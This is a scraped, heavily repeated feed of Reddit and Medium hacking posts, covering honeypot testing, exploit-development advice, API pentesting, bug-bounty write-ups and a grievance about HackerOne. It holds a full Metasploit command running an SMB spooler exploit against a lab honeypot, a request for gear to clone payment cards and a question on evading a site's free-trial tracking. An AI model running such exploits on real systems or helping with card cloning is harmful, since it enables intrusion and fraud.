Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What is the Best Story of You?
https://cdn-images-1.medium.com/max/2055/1*TbBe81D6NNpVM8LsWqj6oQ.jpeg
CHAPTER SEVEN
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is the Best Story of You?
https://cdn-images-1.medium.com/max/2055/1*TbBe81D6NNpVM8LsWqj6oQ.jpeg
CHAPTER SEVEN
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is the Best Story of You?
CHAPTER SEVEN
Question about honeypot pentest Dionaea
https://www.reddit.com/r/Pentesting/comments/ww1upw/question_about_honeypot_pentest_dionaea/
Hi I was wondering if someone could shed some light on the issue im having, Currently i have set up TPOT honey, trying to use the Dionaea, i can trigger alerts running msfconsole -x "use exploit/windows/smb/ms10_061_spoolss; set PNAME XPSPrinter; set RHOST 192.168.7.111; set LHOST 192.168.6.187; set LPORT 4444; exploit; exit" but cant seem to trigger alerts for only http i have tried various exploits but does not show on Dionaea any ideas? Thank you submitted by /u/killmasta93 (https://www.reddit.com/user/killmasta93)
[link] (https://www.reddit.com/r/Pentesting/comments/ww1upw/question_about_honeypot_pentest_dionaea/) [comments] (https://www.reddit.com/r/Pentesting/comments/ww1upw/question_about_honeypot_pentest_dionaea/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/ww1upw/question_about_honeypot_pentest_dionaea/
Hi I was wondering if someone could shed some light on the issue im having, Currently i have set up TPOT honey, trying to use the Dionaea, i can trigger alerts running msfconsole -x "use exploit/windows/smb/ms10_061_spoolss; set PNAME XPSPrinter; set RHOST 192.168.7.111; set LHOST 192.168.6.187; set LPORT 4444; exploit; exit" but cant seem to trigger alerts for only http i have tried various exploits but does not show on Dionaea any ideas? Thank you submitted by /u/killmasta93 (https://www.reddit.com/user/killmasta93)
[link] (https://www.reddit.com/r/Pentesting/comments/ww1upw/question_about_honeypot_pentest_dionaea/) [comments] (https://www.reddit.com/r/Pentesting/comments/ww1upw/question_about_honeypot_pentest_dionaea/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Question about honeypot pentest Dionaea
Hi I was wondering if someone could shed some light on the issue im having, Currently i have set up TPOT honey, trying to use the Dionaea, i can...
hacking: security in practice
Exploit development language to learn
After I get my network, web app, and api hacking down to where I feel like I'm an intermediate at least, I want to start exploit development. I've looked around and at least one person says to learn C then Assembly. Is that necessary? It sounds like a herculean task. Would I be able to do some exploit development with Python? How far would that take me?
submitted by /u/Available_Dream_9764
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Exploit development language to learn
After I get my network, web app, and api hacking down to where I feel like I'm an intermediate at least, I want to start exploit development. I've looked around and at least one person says to learn C then Assembly. Is that necessary? It sounds like a herculean task. Would I be able to do some exploit development with Python? How far would that take me?
submitted by /u/Available_Dream_9764
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Exploit development language to learn
After I get my network, web app, and api hacking down to where I feel like I'm an intermediate at least, I want to start exploit development. ...
hacking: security in practice
Best info. advice for soon to be badness
Best, within reasonable price range not too cheap you buy cheap at times you get cheap. Looking for a decent credit card reader writer thanks guys! Have to copy some card info on blanks so I can be in "the game" ! Thanks again so much ! ❤️ ✌️
submitted by /u/Maris_saD
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Best info. advice for soon to be badness
Best, within reasonable price range not too cheap you buy cheap at times you get cheap. Looking for a decent credit card reader writer thanks guys! Have to copy some card info on blanks so I can be in "the game" ! Thanks again so much ! ❤️ ✌️
submitted by /u/Maris_saD
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Best info. advice for soon to be badness
Best, within reasonable price range not too cheap you buy cheap at times you get cheap. Looking for a decent credit card reader writer thanks...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How to bypass a trial on a website
This is gonna sound goofy but this is the only sub that I believe would have any idea on how to help me. So there is this website (imgupscaler.com) that gives you free access to their services for a number of times before you are forced to buy one of their plans. But for some reason they are able to track you across multiple browsers and devices. I tried vpns, tor and even and bluestacks (I'm not exactly a hacker). So what exactly is the common piece of information that is able to identify me? Is it my mac address or some sort of IP address?
submitted by /u/G2H3LL
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to bypass a trial on a website
This is gonna sound goofy but this is the only sub that I believe would have any idea on how to help me. So there is this website (imgupscaler.com) that gives you free access to their services for a number of times before you are forced to buy one of their plans. But for some reason they are able to track you across multiple browsers and devices. I tried vpns, tor and even and bluestacks (I'm not exactly a hacker). So what exactly is the common piece of information that is able to identify me? Is it my mac address or some sort of IP address?
submitted by /u/G2H3LL
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to bypass a trial on a website
This is gonna sound goofy but this is the only sub that I believe would have any idea on how to help me. So there is this website...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Blog Post Importance of reporting in pentest
The importance of the Report in the pentesting field
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Blog Post Importance of reporting in pentest
The importance of the Report in the pentesting field
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Blog Post Importance of reporting in pentest
The importance of the Report in the pentesting field
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
API HACKING ⚙️
https://cdn-images-1.medium.com/max/764/1*0YWI_XWTyxWbsYv5kR29Hg@2x.jpeg
APIs are an excellent attack vector. After all, they’re designed to expose information to other applications. APIs are digital pipelines…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
API HACKING ⚙️
https://cdn-images-1.medium.com/max/764/1*0YWI_XWTyxWbsYv5kR29Hg@2x.jpeg
APIs are an excellent attack vector. After all, they’re designed to expose information to other applications. APIs are digital pipelines…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
API HACKING ⚙️
APIs are an excellent attack vector. After all, they’re designed to expose information to other applications. APIs are digital pipelines…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Google bloquea el ataque DDoS web ‘más grande de la historia’
https://cdn-images-1.medium.com/max/1755/0*P63v3u35qdc8weFN
Google ha informado que ha bloqueado el ataque de denegación de servicio distribuido (DDoS) ‘más grande’ registrado, que tuvo un pico de…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Google bloquea el ataque DDoS web ‘más grande de la historia’
https://cdn-images-1.medium.com/max/1755/0*P63v3u35qdc8weFN
Google ha informado que ha bloqueado el ataque de denegación de servicio distribuido (DDoS) ‘más grande’ registrado, que tuvo un pico de…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Google bloquea el ataque DDoS web ‘más grande de la historia’
Google ha informado que ha bloqueado el ataque de denegación de servicio distribuido (DDoS) ‘más grande’ registrado, que tuvo un pico de 46…
Break the Logic: Insecure Parameters (€300)
Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same…Continue reading on Medium »
Read more...
Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same…Continue reading on Medium »
Read more...
Rest API Pentesting
https://www.reddit.com/r/Pentesting/comments/ww6t2f/rest_api_pentesting/
Hi there! I currently need to learn about how to do a pentest on a rest api web application. I was wondering if someone can recommend me a lab to practice and probably a good course to learn about it. submitted by /u/ushioyuuki (https://www.reddit.com/user/ushioyuuki)
[link] (https://www.reddit.com/r/Pentesting/comments/ww6t2f/rest_api_pentesting/) [comments] (https://www.reddit.com/r/Pentesting/comments/ww6t2f/rest_api_pentesting/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/ww6t2f/rest_api_pentesting/
Hi there! I currently need to learn about how to do a pentest on a rest api web application. I was wondering if someone can recommend me a lab to practice and probably a good course to learn about it. submitted by /u/ushioyuuki (https://www.reddit.com/user/ushioyuuki)
[link] (https://www.reddit.com/r/Pentesting/comments/ww6t2f/rest_api_pentesting/) [comments] (https://www.reddit.com/r/Pentesting/comments/ww6t2f/rest_api_pentesting/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Rest API Pentesting
Hi there! I currently need to learn about how to do a pentest on a rest api web application. I was wondering if someone can recommend me a lab to...
Break the Logic: Insecure Parameters (€300)
https://canmustdie.medium.com/break-the-logic-insecure-parameters-300-e655cc4fcc42?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://canmustdie.medium.com/break-the-logic-insecure-parameters-300-e655cc4fcc42?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Break the Logic: Insecure Parameters (€300)
Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same…
Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same…Continue reading on Medium » (https://canmustdie.medium.com/break-the-logic-insecure-parameters-300-e655cc4fcc42?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Break the Logic: Insecure Parameters (€300)
Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same…
hacking: security in practice
Recommended reverse engineering book
Hello, A while ago I read most of "Hacking, the art of exploitation" by Jon Erickson and it kind of blew my mind with how in depth it went into buffer overflows and how easy it was to exploit badly written software. I still need to finish the book but I have been looking into what to read after this.
I was looking for a book recommendation for coding malware, reverse engineering malware, writing exploits, or things of that nature.
submitted by /u/arcticface442
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Recommended reverse engineering book
Hello, A while ago I read most of "Hacking, the art of exploitation" by Jon Erickson and it kind of blew my mind with how in depth it went into buffer overflows and how easy it was to exploit badly written software. I still need to finish the book but I have been looking into what to read after this.
I was looking for a book recommendation for coding malware, reverse engineering malware, writing exploits, or things of that nature.
submitted by /u/arcticface442
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit
Explore this post and more from the hacking community
https://b.thumbs.redditmedia.com/fLWr_A_iWv4cAybDdOpDW78-Ds9S6SfIGYsayjc30lA.jpg I found a vulnerability in yahoo that allows you to perfectly impersonate a brand. You give yahoo the right input and they give you the profile pic of the brand and a link to their website as you can see in the attached pictures (I personally moved freelancer.com to the spam folder before), as you can see those emails would never be sent by a reputable organization I sent them to myself durring testing.
https://preview.redd.it/ypcftel4kkj91.png?width=1620&format=png&auto=webp&s=ddc877ff5462b4fdd14c453b829908876fee5dfe
https://preview.redd.it/2n8jyt76kkj91.png?width=1599&format=png&auto=webp&s=957e25ab73b9b8760b122a0c24077edf620731c2
However this vulnerability no longer works because, I reported it to hackerone, along with the python script that I wrote to run the exploit, and they reported it to yahoo to patch it and finally, they closed my report without paying me as it is social engineering and is out of the scope of the program. Why did they report it to yahoo if it is out of the scope of their shitty program, or is the scope for the payments only ? For those sleazy bounty hunters ? For those who wasted their time to find a vulnerability and decided to do the right thing and report it to the right people ? Except those people are the worst of the worst.
This is obviously a vulnerability in yahoo, they rely on untrusted input and have improper authentication.
Do not submit your reports to hackerone, go ANYWHERE else, they work for the corporates, they do their best to save their precious money while keeping them secure, this makes sense because the corporates are the ones paying them after all.
I am never reporting anything to hackerone ever again, please spread this as much as you can.
submitted by /u/Iam_cool_asf
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
https://preview.redd.it/ypcftel4kkj91.png?width=1620&format=png&auto=webp&s=ddc877ff5462b4fdd14c453b829908876fee5dfe
https://preview.redd.it/2n8jyt76kkj91.png?width=1599&format=png&auto=webp&s=957e25ab73b9b8760b122a0c24077edf620731c2
However this vulnerability no longer works because, I reported it to hackerone, along with the python script that I wrote to run the exploit, and they reported it to yahoo to patch it and finally, they closed my report without paying me as it is social engineering and is out of the scope of the program. Why did they report it to yahoo if it is out of the scope of their shitty program, or is the scope for the payments only ? For those sleazy bounty hunters ? For those who wasted their time to find a vulnerability and decided to do the right thing and report it to the right people ? Except those people are the worst of the worst.
This is obviously a vulnerability in yahoo, they rely on untrusted input and have improper authentication.
Do not submit your reports to hackerone, go ANYWHERE else, they work for the corporates, they do their best to save their precious money while keeping them secure, this makes sense because the corporates are the ones paying them after all.
I am never reporting anything to hackerone ever again, please spread this as much as you can.
submitted by /u/Iam_cool_asf
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit: Hackerone fucked me over
Explore this post and more from the hacking community